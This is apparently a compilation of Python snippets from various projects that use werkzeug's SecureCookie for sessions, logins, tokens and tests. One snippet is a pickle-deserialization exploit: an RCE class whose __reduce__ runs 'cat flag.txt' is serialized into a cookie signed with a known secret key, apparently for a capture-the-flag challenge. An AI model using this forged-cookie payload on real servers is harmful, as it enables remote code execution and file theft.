def test_basic_support(): c = SecureCookie(secret_key=b'foo') assert c.new assert not c.modified assert not c.should_save c['x'] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, b'foo') assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save assert c2 == c c3 = SecureCookie.unserialize(s, b'wrong foo') assert not c3.modified assert not c3.new assert c3 == {} c4 = SecureCookie({'x': 42}, 'foo') c4_serialized = c4.serialize() assert SecureCookie.unserialize(c4_serialized, 'foo') == c4
def test_basic_support(): c = SecureCookie(secret_key=b"foo") assert c.new assert not c.modified assert not c.should_save c["x"] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, b"foo") assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save assert c2 == c c3 = SecureCookie.unserialize(s, b"wrong foo") assert not c3.modified assert not c3.new assert c3 == {} c4 = SecureCookie({"x": 42}, "foo") c4_serialized = c4.serialize() assert SecureCookie.unserialize(c4_serialized, "foo") == c4
def set_cookie(self, response, name, data, path=None, expires=None, secret_key=None, max_age=None, secure=False, httponly=True, force=True): """store data under the named cookie as a securecookie in the response""" if secret_key is None: secret_key = self.config.get('secret_key', None) cookie = SecureCookie(data, secret_key=secret_key) path = path or self.config.get('session_cookie_path') or \ self.config.get('application_root') or '/' cookie.save_cookie(response, key=name, expires=expires, max_age=max_age, path=path, domain=self.config.session_cookie_domain, secure=secure, httponly=httponly, force=force)
def saveOAuthToken(next, token, secret, max_age=3000): secretKey = current_app.config['SECRET_KEY'].encode('utf-8') data = SecureCookie({"token": token, "secret": secret}, secretKey) expires = datetime.utcnow() + timedelta(seconds=max_age) resp = make_response(next) resp.set_cookie('zapfauth_token', data.serialize(), expires=expires) return resp
def get_cookie_obj(cookie): cookie_data = request.cookies.get(cookie, None) if cookie_data is None: cookie_obj = SecureCookie(secret_key=app.config["SECRET_KEY"]) else: cookie_obj = SecureCookie.unserialize(cookie_data, app.config["SECRET_KEY"]) return cookie_obj
def client_session(req): data = request.cookies.get('ruanbo') if not data: return SecureCookie({ "foo": 42, "baz": (1, 2, 3) }, secret_key=SECRET_KEY) return SecureCookie.unserialize(data, SECRET_KEY)
def get_from_cookie(cookie, key): cookie_data = request.cookies.get(cookie, None) if cookie_data is None: cookie_obj = SecureCookie(secret_key=app.config["SECRET_KEY"]) else: cookie_obj = SecureCookie.unserialize(cookie_data, app.config["SECRET_KEY"]) print("Getting cookie data: ", dict(cookie_obj)) return cookie_obj.get(key)
def set_gaema_user(service, user): gaema_user_key = GAEMA_USER_KEY_FORMAT % service if hasattr(settings, "GAEMA_STORAGE") and settings.GAEMA_STORAGE == "cookie": secure_cookie = SecureCookie(user, secret_key=settings.SECRET_KEY) user_data = secure_cookie.serialize() set_cookie(gaema_user_key, user_data) else: from kay.sessions import renew_session renew_session(local.request) local.request.session[gaema_user_key] = user local.request.session.modified = True
def save_session(self, session, response): # 这个函数将在构造好了response后调用,此函数逻辑是如何session有内容,就将其 # 保存在数据库,然后构建一个新的Securecookie,在传入sid的值,然后保存在response # 中 if session is not None: if session.should_save: self.session_store.save(session) secure_cookie = SecureCookie({}, secret_key=self.secret_key) secure_cookie['sid'] = session.sid # 这里必须要有一次额外的赋值,否则secure_cookie的should_save为False secure_cookie.save_cookie(response, self.session_cookie_name)
def set_to_cookie(req_response, cookie, key, value): cookie_data = request.cookies.get(cookie, None) if cookie_data is None: cookie_obj = SecureCookie(secret_key=app.config["SECRET_KEY"]) else: cookie_obj = SecureCookie.unserialize(cookie_data, app.config["SECRET_KEY"]) cookie_obj[key] = value all_cookies = session.get(ALL_COOKIES_KEY, []) if cookie not in all_cookies: all_cookies.append(cookie) session[ALL_COOKIES_KEY] = all_cookies req_response.set_cookie(cookie, cookie_obj.serialize())
def create_secure_cookie(self, data=None): """Returns a new secure cookie. This cookie must be saved using a response object at the end of a request. To get a cookie that is saved automatically, use :meth:`SessionStore.get_secure_cookie`. :param data: A dictionary to be loaded into the secure cookie. :return: A ``werkzeug.contrib.SecureCookie`` instance. """ if data is not None and not isinstance(data, dict): raise ValueError('Secure cookie data must be a dict.') return SecureCookie(data=data, secret_key=self.config['secret_key'])
def post_process(self, environ, headers): user = User.get_current() if not user: cookies = http.parse_cookie(environ) if self.name in cookies: raw = http.dump_cookie(self.name, '', expires=1) headers.append(('Set-Cookie', raw)) return cookie = SecureCookie( { 'uid': user.id, 'session_token': user.get_session_token(), }, self.secret) raw = http.dump_cookie(self.name, cookie.serialize(), expires=self.expires, max_age=self.max_age) headers.append(('Set-Cookie', raw))
def test_basic_support(self): c = SecureCookie(secret_key=b'foo') assert c.new assert not c.modified assert not c.should_save c['x'] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, b'foo') assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save self.assert_equal(c2, c) c3 = SecureCookie.unserialize(s, b'wrong foo') assert not c3.modified assert not c3.new self.assert_equal(c3, {})
def test_basic_support(self): c = SecureCookie(secret_key='foo') assert c.new assert not c.modified assert not c.should_save c['x'] = 42 assert c.modified assert c.should_save s = c.serialize() c2 = SecureCookie.unserialize(s, 'foo') assert c is not c2 assert not c2.new assert not c2.modified assert not c2.should_save assert c2 == c c3 = SecureCookie.unserialize(s, 'wrong foo') assert not c3.modified assert not c3.new assert c3 == {}
def login(): username = request.values.get('username', '') password = request.values.get('password', '') ret_data = {} is_login = db.check_user(username, password) if is_login: ret_data['status'] = 'ok' else: ret_data['status'] = 'error' ret_data['message'] = 'Username or password is wrong!' resp = Response(json.dumps(ret_data)) if is_login: # New and save `uid` to cookie cookie = SecureCookie(secret_key=app.secret_key) cookie['uid'] = username cookie['is_guest'] = False cookie.save_cookie(resp, key='auth', max_age=USER_COOKIE_AGE) return resp
def save_cookie(response, token): response.set_cookie( COOKIE_SESSION_ID, SecureCookie({ 'token': token }, COOKIE_SECRET_KEY).serialize())
def session(self): data = self.cookies.get(COOKIE_NAME) if not data: return SecureCookie(secret_key=SECRET_KEY) return SecureCookie.unserialize(data, SECRET_KEY)
def _set_flash_msg(request, message): set_cookie('ls_message', SecureCookie({ 'm': message }, settings.SECRET_KEY).serialize())
def __init__(self, secret, data): """Create a new SecureCookieSession """ self.cookie = SecureCookie.unserialize( data, secret) if data else SecureCookie(secret_key=secret)
def init(): ''' For guest user ''' domain = request.args.get('domain', CONFIG['domain']) title = request.args.get('title', CONFIG['title']) theme = request.args.get('theme', CONFIG['theme']) local = request.args.get('local', CONFIG['local']) is_login = '' user = '******' if g.is_login: is_login = '******' record = db.load_visitor(g.uid) record['nick'] = '%s(%s)' % (record['nick'], record['location']) user = { 'id': g.uid, 'nick': record['nick'], 'show': 'available', 'status': '' } user = json.dumps(user) path = 'http://%s/' % CONFIG['domain'] js = u'''var _IMC = { production_name: 'service', version: '%(version)s', domain: '%(domain)s', path: '%(path)s', is_login: '******', user: %(user)s, setting:{ play_sound: true, minimize_layout: true, buddy_sticky: true }, disable_chatlink: '', title: '%(title)s', theme: '%(theme)s', local: '%(local)s', jsonp: '1', min: window.location.href.indexOf("webim_debug") != -1 ? "" : ".min" }; _IMC.script = window.webim ? '' : ('<link href="' + _IMC.path + 'static/webim.' + _IMC.production_name + _IMC.min + '.css?' + _IMC.version + '" media="all" type="text/css" rel="stylesheet"/><link href="' + _IMC.path + 'static/themes/' + _IMC.theme + '/jquery.ui.theme.css?' + _IMC.version + '" media="all" type="text/css" rel="stylesheet"/><script src="' + _IMC.path + 'static/webim.' + _IMC.production_name + _IMC.min + '.js?' + _IMC.version + '" type="text/javascript"></script><script src="' + _IMC.path + 'static/i18n/webim-' + _IMC.local + '.js?' + _IMC.version + '" type="text/javascript"></script>'); _IMC.script += '<script src="' + _IMC.path + 'static/webim.js?' + _IMC.version + '" type="text/javascript"></script>'; document.write( _IMC.script );''' % { 'version': CONFIG['version'], 'domain': domain, 'path': path, 'is_login': is_login, 'user': user, 'title': title, 'theme': theme, 'local': local, } resp = Response(js, content_type='text/javascript') # Save uid to cookie if not g.is_login: print 'Save uid to cookie' cookie = SecureCookie(secret_key=app.secret_key) cookie['uid'] = g.uid cookie['is_guest'] = True cookie.save_cookie(resp, key='auth', max_age=VISITOR_COOKIE_AGE) return resp
def test_pickle_deprecated(): with pytest.warns(UserWarning): SecureCookie({"foo": "bar"}, "secret").serialize()
import os import subprocess from werkzeug.contrib.securecookie import SecureCookie class RCE(object): def __reduce__(self): return (subprocess.check_output, (['cat','flag.txt'],)) SECRET_KEY = 'superdupersecretflagonkey' payload = {'name': RCE() , 'username': '******'} x = SecureCookie(payload, SECRET_KEY) value = x.serialize() print(value)
def secure_encode(adict, secretkey): return SecureCookie(data=adict, secretkey=secretkey, new=True).serialize()
def encodeCookie(_sessionId): scookie = SecureCookie( {sessionOptions['session_cookie_id']: _sessionId}, sessionOptions['session_secret_key']) return serializer.dumps(scookie)
def session(self): data = self.cookies.get(login_cookie) if not data: return SecureCookie(secret_key=cookie_key) return SecureCookie.unserialize(data, cookie_key)